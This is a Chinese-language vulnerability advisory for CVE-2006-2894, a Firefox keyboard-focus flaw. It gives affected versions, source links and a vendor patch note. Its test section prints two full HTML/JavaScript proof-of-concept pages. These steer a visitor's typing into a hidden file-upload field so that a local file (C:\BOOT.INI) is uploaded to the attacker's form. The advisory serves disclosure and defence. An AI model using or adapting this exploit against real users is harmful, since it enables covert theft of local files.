安全研究
安全漏洞
Firefox重新定向鼠标焦点处理漏洞
发布日期:2006-06-06
更新日期:2007-10-23
受影响系统:
Mozilla Firefox < 2.0.0.8不受影响系统:
Mozilla SeaMonkey < 1.1.5
Mozilla Firefox 2.0.0.8描述:
Mozilla SeaMonkey 1.1.5
BUGTRAQ ID: 18308
CVE(CAN) ID: CVE-2006-2894
Firefox是一款流行的开源WEB浏览器。
Firefox在处理onKeyDown/onKeyPress事件时存在漏洞,恶意网页可能利用此漏洞获取用户系统上的特定文件。
Firefox没有正确地处理onKeyDown/onKeyPress事件,允许在用户不知情的情况下移动上述两个事件之间的鼠标焦点。如果攻击者知道了到文件的完整路径名且能够诱骗用户键入超长内容的话,就可以暗中将鼠标焦点重新定向到其他受保护的文件上传表单字段,将任意文件上传到攻击者所选择的站点。
<*来源:Michal Zalewski (lcamtuf@echelon.pl)
Charles McAuley (cmcauley@imperfectnetworks.com)
链接:https://bugzilla.mozilla.org/show_bug.cgi?format=multiple&id=370092
http://lists.grok.org.uk/pipermail/full-disclosure/2007-February/052333.html
http://secunia.com/advisories/20442/print/
http://lists.grok.org.uk/pipermail/full-disclosure/2006-June/046610.html
http://www.mozilla.org/security/announce/2007/mfsa2007-32.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<HEAD>
<SCRIPT>
//document.onKeyDown = doKeyPress;
//document.onKeyUp = doKeyUp;
var saved;
var e ;
var mystring = "C:\\BOOT.INI";
var i=mystring.length-1;
function doKeyPress () {
e = window.event;
saved = e.keyCode;
window.status = "e.keyCode == " + e.keyCode + "character is " +
mystring.charCodeAt(i);
if(e.keyCode != mystring.charCodeAt(i))
{
//e.keyCode =0;
e.returnValue=false;
e.cancelBubble=true;
}
else {
i--;
}
document.forms[0].fileupload.focus();
}
function doKeyUp () {
document.forms[0].txt.value += String.fromCharCode(saved);
document.forms[0].txt.focus();
}
function switchtype() {
/* var e = document.getElementById('txt');
document.forms[0].txt.setAttribute("type", "file");
e.setAttribute("value", "asfasfsd");
*/
}
function fux0rKeys() {
}
</SCRIPT>
</HEAD>
<BODY onload="document.forms[0].txt.value='sometext';
document.forms[0].fileupload.value='asdfsdfadsf';">
<FORM METHOD=POST action=file.php>
<INPUT id='asdf' name="fileupload" defaultValue='asdfasdf' TYPE=FILE
OnKeyUp="doKeyUp();"
OnKeyPress="doKeyPress();">
<input name=txt id='txt' type=text value='asdfsdafasdf'
OnKeyDown="document.forms[0].fileupload.focus();"
asdfnKeyDown="document.forms[0].txt.fireEvent('onKeyPress');"
onClick=""> visible
</FORM>
</BODY>
</HTML>
<HTML>
<HEAD>
<style type="text/css">
.first {
}
.second {
color: white;
background-color: white;
opacity: 0;
}
</style>
<SCRIPT>
//document.onKeyDown = doKeyPress;
//document.onKeyUp = doKeyUp;
var saved;
var e ;
var mystring = "C:\\BOOT.INI";
//var i=mystring.length-1;
var i=0;
function doKeyPress(chucky)
{
saved = chucky.which;
//alert('pressed ' + String.fromCharCode(saved) + '(' + saved + ')');
if (mystring[i] != String.fromCharCode(saved).toUpperCase() ||
i > mystring.length-1) {
return false;
}
i++;
return true;
};
function doKeyUp () {
document.forms[0].txt.value += String.fromCharCode(saved);
document.forms[0].txt.focus();
}
</SCRIPT>
</HEAD>
<BODY >
<FORM METHOD=POST action=file.php>
<INPUT id='asdf' name="fileupload" defaultValue='asdfasdf' TYPE=FILE
OnKeyUp="doKeyUp();"
OnKeyPress="return doKeyPress(event);">
<input name=txt id='txt' type=text value=''
OnKeyDown="document.forms[0].fileupload.focus();"
onClick="">
<input type=button value="invisible"
onclick="document.forms[0].fileupload.className='second';">
<input type=button value="visible"
onclick="document.forms[0].fileupload.className='first';">
</FORM>
</BODY>
</HTML>
建议:
厂商补丁:
Mozilla
-------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.mozilla.org/
浏览次数:2424
严重程度:0(网友投票)
绿盟科技给您安全的保障